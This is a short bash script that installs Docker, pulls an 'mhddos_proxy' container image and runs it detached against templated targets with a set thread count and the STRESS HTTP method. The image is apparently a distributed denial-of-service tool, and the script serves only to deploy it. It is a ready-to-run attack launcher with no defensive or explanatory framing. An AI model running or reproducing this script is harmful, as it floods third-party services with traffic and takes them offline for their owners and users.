#!/bin/bash

apt-get update
apt-get install -y docker.io

docker pull ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest

docker run -d -it ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest ${targets} -t ${threads} \
    --http-methods STRESS --debug
